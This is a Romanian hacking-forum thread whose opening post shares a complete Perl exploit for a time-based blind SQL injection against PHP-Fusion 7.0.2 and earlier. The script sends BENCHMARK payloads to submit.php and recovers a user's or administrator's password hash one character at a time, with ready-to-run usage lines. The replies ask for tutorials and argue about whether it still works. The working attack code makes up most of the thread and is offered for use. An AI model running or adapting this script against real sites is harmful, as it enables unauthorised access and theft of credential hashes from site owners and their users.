Mata-i grasa _|_
RST  

Go Back   RST > >> 1337 Zone << > Exploituri si POCs

Exploituri si POCs Cele mai noi exploituri

Reply
Old 12-25-2008, 11:58 AM   #1 (permalink)
Registered user
Bautor de whiskey
 
vini4p's Avatar
 
Join Date: Nov 2008
Posts: 317
Rep Power: 2
vini4p se balangane pe drum
Send a message via Yahoo to vini4p
vini4p is offline

Default PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit


hotel regim hotelier
hotel yahoo domain
Code:
#!/usr/bin/perl -w
# -------------------------------------------------------
# PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit
# by athos - staker[at]hotmail[dot]it
# download on http://php-fusion.co.uk
# -------------------------------------------------------
# Usage:
# perl xpl.pl host/path prefix user_id user_pwd target_id
# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1
# -------------------------------------------------------
# Note: magic_quotes_gpc off 
#       don't add me on msn messenger 
#       my email staker.38@gmail.com
# 
# Greetz: str0ke,The:Paradox,darkjoker,Key and #cancer :D 
# -------------------------------------------------------
# User Password:  my $field = "user_password" ;
# Admin Password: my $field = "user_admin_password";                   
# -------------------------------------------------------

use strict;
use Digest::MD5('md5_hex');
use LWP::UserAgent;


my $field = "user_password";
my ($stop,$start,$hash);


my $domain = shift;
my $ptable = shift;
my $ulogin = shift;
my $plogin = shift;
my $userid = shift or &usage;

my @chars = (48..57, 97..102); 
my $substr = 1; 
my $http = new LWP::UserAgent;



sub send_request
{ 
     my $post = undef;
     my $host = $domain;
     my $param = shift @_ or die $!;
  
     $host  .= "/submit.php?stype=l";

     $http->default_header('Cookie' => "fusion_user=${ulogin}.".md5_hex($plogin));
     $post = $http->post('http://'.$host,[
                                 'link_category'    => 1,
                                 'link_name'        => 1,
                                 'link_url'         => 1,
                                 'link_description' => 1,
                                 'submit_link'      => 'Submit+Link',
                                 'submit_info[pwn]' => $param,
                               ]);
 
}


sub give_char
{
     my $send = undef;
     my ($charz,$uidz) = @_;
  
     $send = "' or (select if((ascii(substring".
             "($field,$uidz,1))=$charz),".
             "benchmark(230000000,char(0)),".
            "0) from ${ptable}_users where user_id=$userid))#";

     return $send;
}


for(1..32) 
{
     foreach my $set(@chars)
     {
          my $start = time();
    
          send_request(give_char($set,$substr));
    
          my $stop = time();
  
         if($stop - $start > 6)
         { 
              syswrite(STDOUT,chr($set));
              $substr++; 
              last;
        }
    }
}

sub usage
{
      print "PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit\n";
      print "by athos - staker[at]hotmail[dot]it\n";
      print "Usage: perl $0 [host/path] [table prefix] [id] [password] [target id]\n";
      print "Usage: perl $0 localhost/php-fusion fusion 5 p4ssw0rd 1\n"; 
      exit; 
}
  Reply With Quote
Sponsored Links
Re: PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit
Old 03-18-2009, 08:43 PM   #2 (permalink)
Registered user
Bautor de vin
 
Join Date: Mar 2009
Posts: 69
Rep Power: 0
Hugo is an unknown quantity at this point
Hugo is offline
Default

Cred ca pt cei interesati (si mai nepriceputi) ar fi mai de ajutor daca ai scrie si catea cuvinte despre ce sa faca cu textul de mai sus! Efortul este apreciat oricum
  Reply With Quote
Re: PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit
Old 03-18-2009, 10:21 PM   #3 (permalink)
Registered user
Bautor de bere
 
Join Date: Jan 2009
Posts: 41
Rep Power: 0
fjtr se balangane pe drum
fjtr is offline
Default

# -------------------------------------------------------
# Usage:
# perl xpl.pl host/path prefix user_id user_pwd target_id
# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1
# -------------------------------------------------------
  Reply With Quote
Re: PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit
Old 03-20-2009, 10:31 AM   #4 (permalink)
Registered user
Bautor de ceai
 
Join Date: Jan 2009
Location: romania
Posts: 7
Rep Power: 0
hi2na se balangane pe drum
hi2na is offline
Default

ceva scris ar fi supper sau mai super un tutorial video pls
:
  Reply With Quote
Re: PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit
Old 03-20-2009, 10:49 AM   #5 (permalink)
Registered Users
Bautor de gin
 
luyzette's Avatar
 
Join Date: Jul 2008
Posts: 174
Rep Power: 3
luyzette se balangane pe drum
luyzette is offline
Default

vini4p iti cam place sa te lasi rugat?
  Reply With Quote
Re: PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit
Old 03-20-2009, 10:28 PM   #6 (permalink)
Registered Users
Bautor de ceai
 
Join Date: Feb 2008
Posts: 6
Rep Power: 0
BiffBuzz se balangane pe drum
BiffBuzz is offline
Default

milw0rm
  Reply With Quote
Re: PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit
Old 07-02-2009, 08:07 PM   #7 (permalink)
Banned
Bautor de bere
 
Join Date: Jul 2009
Posts: 42
Rep Power: 0
Laur13 se balangane pe drum
Laur13 is offline
Default

Iit bat la pariu ca nu merge exploitul ...


Ps : este expoloit in perl, active perl ... il downloadezi dp [Doar userii inregistrati pot vedea linkurile. ]
  Reply With Quote
Re: PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit
Old 07-02-2009, 08:14 PM   #8 (permalink)
Registered user
Bautor de absinth
 
Join Date: Mar 2009
Posts: 785
Rep Power: 2
tromfil se balangane pe drum
tromfil is offline
Default

@Laur13:
1. Logic ca e perl.
2. Are peste jumatate de an, iar de mers, nu merge pe versiunile noi.
  Reply With Quote
Re: PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit
Old 07-02-2009, 08:26 PM   #9 (permalink)
Banned
Bautor de bere
 
Join Date: Jul 2009
Posts: 42
Rep Power: 0
Laur13 se balangane pe drum
Laur13 is offline
Default

Quote:
Originally Posted by Hugo View Post
Cred ca pt cei interesati (si mai nepriceputi) ar fi mai de ajutor daca ai scrie si catea cuvinte despre ce sa faca cu textul de mai sus! Efortul este apreciat oricum
Eu am raspuns la ce mia zis hugo ...
  Reply With Quote
Re: PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit
Old 07-03-2009, 06:45 PM   #10 (permalink)
Registered Users
Bautor de gin
 
Zatarra's Avatar
 
Join Date: Aug 2006
Location: /etc/sudoers
Posts: 228
Rep Power: 0
Zatarra is an unknown quantity at this point
Zatarra is offline
Default

Laur nu sti tu sa`l faci sa mearga aia ii altceva
__________________
ReSpEcT
  Reply With Quote
Reply

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On
Forum Jump




Copywr0ng (c) 2009 Miercuri catre Joi - RST
All logos and trademarks in this site are property of their respective

Hosted by powerhost.ro